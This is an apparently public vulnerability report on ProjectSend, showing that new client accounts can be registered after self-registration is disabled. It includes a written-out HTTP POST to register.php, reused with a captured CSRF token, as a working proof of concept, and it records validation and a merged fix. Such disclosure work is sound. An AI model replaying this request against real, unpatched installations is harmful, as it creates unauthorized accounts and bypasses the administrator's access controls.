Execution with Unnecessary Privileges in projectsend/projectsend

Valid

Reported on

Jul 2nd 2021


💥 BUG

create client even when self client registration is disabled

💥 IMPACT

any user can create create client even when self client registration is disabled

💥 STEP TO REPRODUCE

1. From admin account goto http://localhost/projectsend2/options.php?section=clients and disabled client registration.
So, self client registration is not possible anymore .
2.Now from another browser goto http://localhost/projectsend2/index.php and here you can see message This server does not allow self registrations. .
Now get csrf-token from this login page http://localhost/projectsend2/index.php and sent bellow request to register a client .\

POST /projectsend2/register.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 171
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/projectsend2/register.php
Cookie: PHPSESSID=6vvp9v5o64e56lqj87duod7jm5
Upgrade-Insecure-Requests: 1

csrf_token=78cfe208f087a66cd28f28e000602caa3d2350a9258b8ddfd4cf113e0f6cad71&name=client4&username=client4&password=pahan12&email=client4%40localhost.com&address=sss&phone=

here in this request postdata change csrf_token parameter value to above captured csrf value and this request will create a new client .

So, any external user can create client even when client-registration is disabled

We have contacted a member of the projectsend team and are waiting to hear back 7 months ago
ranjit-git
2 months ago

Researcher


hello, maintainer can you plz validate this report

Ignacio Nelson validated this vulnerability 23 days ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Ignacio Nelson confirmed that a fix has been merged on 240d20 23 days ago
Ignacio Nelson has been awarded the fix bounty